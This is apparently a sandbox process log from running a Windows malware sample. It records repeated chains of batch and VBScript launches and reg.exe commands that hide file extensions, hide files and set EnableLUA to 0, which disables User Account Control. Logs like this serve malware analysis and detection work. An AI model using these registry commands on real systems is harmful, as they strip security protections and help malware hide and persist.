cmd /c ""C:\Users\Admin\AppData\Local\Temp\zmYAgYQQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LkoQckcM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\BMoIckoA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\kiMYgsIE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QYoEEkkw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\IsQMcwMA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\yEcIQYcM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\roUUgAAc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZGAsMsQY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nUcYoYYU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SkgswUMQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-26728919-46165044-11943015432050424313227620917192518962118393325151439497"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\omwMcUIM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\MkYgoIAQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\OQAgMMcg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1102150012621024566-636749727-120923497721160739061291870401-252701871-307716917"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\JuIQIIYw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-16035578782105433095-195825585877273784893015752-195879498995605744-1617114636"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\rCYIAAIA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VwQkIkkI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TOYkEIQw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\OMkEgQoY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3713853621019169956734558897262827681262718511-2087381153729892912743278624"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\sygwAQkg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EUYEsswk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1729302193-16294046172014723176-264518364-535671599-84248870-59146782-1356971811"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1510135592-1152830573-41456914617837833346670410835941276221877567391267014922"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-997265813-1582337210-17786799138713761441048656478-987996506296200965-160323846"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QqoMocIc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\iScoQIgs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
